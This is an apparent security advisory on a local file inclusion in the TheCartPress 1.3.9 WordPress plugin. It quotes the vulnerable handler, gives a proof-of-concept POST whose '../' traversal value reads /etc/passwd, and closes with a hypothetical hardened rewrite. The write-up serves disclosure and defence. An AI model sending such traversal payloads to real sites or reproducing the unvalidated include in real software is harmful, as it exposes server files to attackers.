WordPress TheCartPress Plugin 1.3.9...

Published: 2025-04-13
Revised: 2025-04-13

Affected file: checkout/CheckoutEditor.class.php

```php
function admin_action() {
    if ( empty( $_POST ) ) return;
    if ( isset( $_REQUEST['tcp_save_fields'] ) ) {
        // Both the file to include and the class to instantiate come
        // straight from the request, with no validation.
        $partial_path = $_REQUEST['tcp_box_path'];
        $class_name = $_REQUEST['tcp_box_name'];
        $initial_path = dirname( dirname( TCP_ADMIN_FOLDER ) ) . '/';
        // Sink: attacker-controlled path concatenated onto the plugin root.
        require_once( $initial_path . $partial_path );
        $box = new $class_name();
        $box->save_config_settings();
        $this->updated = true;
    } elseif ( isset( $_REQUEST['tcp_restore_default'] ) ) {
        TCPCheckoutManager::restore_default();
        $this->updated = true;
    }
}
```

The user-supplied tcp_box_path is concatenated onto the plugin's base directory and passed directly into require_once without any validation, so a value containing ../ segments escapes the plugin directory and includes an arbitrary file from the server (local file inclusion). Note that the same handler also takes the class name to instantiate, tcp_box_name, from the request; the write-up only exercises the include. Since the parameters are read from $_REQUEST, they are accepted from the query string as well as from the POST body. admin_action() is reached through the plugin's admin page, so the attacker must already be logged in as an administrator; this is a post-authentication vulnerability.

Log in as an administrator and send a POST request to:

```
http://10.211.55.3/wp-admin/admin.php?page=checkout_editor_settings
```

POST data:

```
tcp_save_fields=1&tcp_box_path=../../../../../../../../../../etc/passwd
```

The file is included successfully (the original page shows a screenshot here, not reproduced). Because the include executes before the subsequent new $class_name() call, the contents of the included file are emitted even though the request then fails on the missing tcp_box_name.
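For comparison, the following is a hardened rewrite of the handler above. It is an added example, not code from TheCartPress or from any vendor patch, and it assumes several things the page does not state: the class name TCPCheckoutEditorHardened, an allowlist TCP_ALLOWED_BOXES with two made-up box classes, a boxes directory at checkout/boxes/ under the plugin root, and a nonce action named tcp_checkout_editor. The point it demonstrates is that a request parameter should never reach require directly: the (class, path) pair is looked up in a fixed allowlist, the resolved path is then checked to still lie inside the expected directory after realpath() has collapsed any "..", and the handler is gated behind a capability check and a nonce.

```php
<?php
/*
 * Added example, not code from TheCartPress or from a vendor patch: a
 * hardened rewrite of the admin_action() handler shown above. Everything
 * named here that is not in the original snippet is hypothetical: the class
 * TCPCheckoutEditorHardened, the TCP_ALLOWED_BOXES map and its entries, the
 * boxes directory checkout/boxes/, and the nonce action tcp_checkout_editor.
 */

// Allowlist: permitted class name => file that defines it, relative to the
// plugin root. Nothing outside this map can be required or instantiated.
const TCP_ALLOWED_BOXES = array(
    'TCPExampleBillingBox'  => 'checkout/boxes/TCPExampleBillingBox.class.php',
    'TCPExampleShippingBox' => 'checkout/boxes/TCPExampleShippingBox.class.php',
);

class TCPCheckoutEditorHardened {

    public $updated = false;

    /*
     * Map a requested (class, path) pair to an absolute file path, or return
     * false. The pair must match the allowlist exactly; on top of that the
     * path, after realpath() has collapsed any ".." segments, must still lie
     * below the boxes directory. The second check is defence in depth: it
     * keeps a future allowlist typo from reintroducing traversal.
     */
    public static function resolve_box_path( $class_name, $partial_path, $plugin_root ) {
        if ( ! is_string( $class_name ) || ! isset( TCP_ALLOWED_BOXES[ $class_name ] ) ) {
            return false;
        }
        if ( ! is_string( $partial_path )
            || ! hash_equals( TCP_ALLOWED_BOXES[ $class_name ], $partial_path ) ) {
            return false;
        }
        $boxes_dir = realpath( $plugin_root . 'checkout/boxes' );
        $target    = realpath( $plugin_root . $partial_path );
        if ( false === $boxes_dir || false === $target ) {
            return false; // directory or file does not exist
        }
        $prefix = $boxes_dir . DIRECTORY_SEPARATOR;
        if ( 0 !== strncmp( $target, $prefix, strlen( $prefix ) ) ) {
            return false; // resolved outside checkout/boxes/
        }
        return $target;
    }

    public function admin_action() {
        if ( empty( $_POST ) ) {
            return;
        }
        // Capability and nonce checks: only an administrator submitting the
        // editor's own form may reach the include, which also closes the CSRF
        // route of having a logged-in admin's browser send the request.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient privileges.' );
        }
        check_admin_referer( 'tcp_checkout_editor' );

        if ( isset( $_POST['tcp_save_fields'] ) ) {
            // Read from $_POST only; the original's $_REQUEST also accepted GET.
            $class_name   = isset( $_POST['tcp_box_name'] ) ? $_POST['tcp_box_name'] : '';
            $partial_path = isset( $_POST['tcp_box_path'] ) ? $_POST['tcp_box_path'] : '';
            $initial_path = dirname( dirname( TCP_ADMIN_FOLDER ) ) . '/';

            $file = self::resolve_box_path( $class_name, $partial_path, $initial_path );
            if ( false === $file ) {
                wp_die( 'Unknown checkout box.' );
            }
            require_once $file;

            // The file is trusted now, but still confirm it defined the class
            // we expect before instantiating anything.
            if ( ! class_exists( $class_name, false )
                || ! method_exists( $class_name, 'save_config_settings' ) ) {
                wp_die( 'Checkout box did not load correctly.' );
            }
            $box = new $class_name();
            $box->save_config_settings();
            $this->updated = true;
        } elseif ( isset( $_POST['tcp_restore_default'] ) ) {
            TCPCheckoutManager::restore_default();
            $this->updated = true;
        }
    }
}
```

Against the PoC above, the request is rejected at the first check because ../../../../../../../../../../etc/passwd does not appear in the allowlist; even if the allowlist were somehow satisfied, realpath() would resolve the traversal to /etc/passwd, which fails the prefix comparison against checkout/boxes/. The class_exists()/method_exists() check after the include also rules out instantiating an arbitrary class via tcp_box_name, the second attacker-controlled input the original handler left unchecked.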
